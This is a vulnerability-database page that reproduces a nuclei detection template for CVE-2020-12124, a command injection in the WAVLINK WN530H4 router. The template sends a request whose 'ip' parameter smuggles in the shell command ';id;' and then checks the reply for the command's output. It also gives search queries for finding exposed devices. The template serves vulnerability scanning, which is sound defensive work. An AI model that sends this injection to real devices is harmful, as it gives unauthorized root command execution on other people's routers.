Lucene search
K

WAVLINK WN530H4 live_api.cgi - Command Injection

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 66 Views

WAVLINK WN530H4 live_api.cgi Command Injection allows remote attackers to execute arbitrary Linux commands as root without authenticatio

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2020-12124
20 Dec 202315:42
circl
CVE
CVE-2020-12124
2 Oct 202008:11
cve
Cvelist
CVE-2020-12124
2 Oct 202008:11
cvelist
NVD
CVE-2020-12124
2 Oct 202009:15
nvd
OSV
CVE-2020-12124
2 Oct 202009:15
osv
Prion
Design/Logic Flaw
2 Oct 202009:15
prion
RedhatCVE
CVE-2020-12124
9 Jan 202609:56
redhatcve
VulnCheck KEV
VulnCheck KEV: CVE-2020-12124
30 Mar 202400:00
vulncheck_kev
id: CVE-2020-12124

info:
  name: WAVLINK WN530H4 live_api.cgi - Command Injection
  author: DhiyaneshDK
  severity: critical
  description: |
    A remote command-line injection vulnerability in the /cgi-bin/live_api.cgi endpoint of the WAVLINK WN530H4 M30H4.V5030.190403 allows an attacker to execute arbitrary Linux commands as root without authentication.
  impact: |
    Unauthenticated attackers can execute arbitrary Linux commands as root on the WAVLINK WN530H4 device, potentially leading to complete system compromise, data theft, or using the device as a pivot point for further attacks.
  remediation: |
    Apply vendor security patches if available or replace the device with a secure alternative. Restrict access to the management interface.
  reference:
    - https://github.com/db44k/CVE-2020-12124
    - https://cerne.xyz/bugs/CVE-2020-12124
    - https://www.wavlink.com/en_us/product/WL-WN530H4.html
    - https://github.com/Scorpion-Security-Labs/CVE-2020-12124
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-12124
    cwe-id: CWE-78
    epss-score: 0.75215
    epss-percentile: 0.99452
    cpe: cpe:2.3:o:wavlink:wn530h4_firmware:m30h4.v5030.190403:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: wavlink
    product: wn530h4_firmware
    shodan-query: http.html:"wavlink"
    fofa-query: body="wavlink"
  tags: cve,cve2020,rce,wavlink,vkev,vuln
variables:
  str: "{{rand_base(3)}}"
  num: "{{rand_int(1, 10)}}"

http:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/live_api.cgi?page={{str}}&id={{num}}&ip=;id;"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"

      - type: word
        part: body
        words:
          - "WiFiBand"

      - type: status
        status:
          - 200
# digest: 490a00463044022038e6c301d0fc98edc1b5eb7648359f4274be2c1f8b5e2d2ec5508934409fa6c2022063c21f7b7facf65d430bc5a0bdb40f850b5401886255ece6cba57bbc2ab19842:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.5High risk
Vulners AI Score7.5
CVSS 3.19.8
CVSS 210
EPSS0.75215
66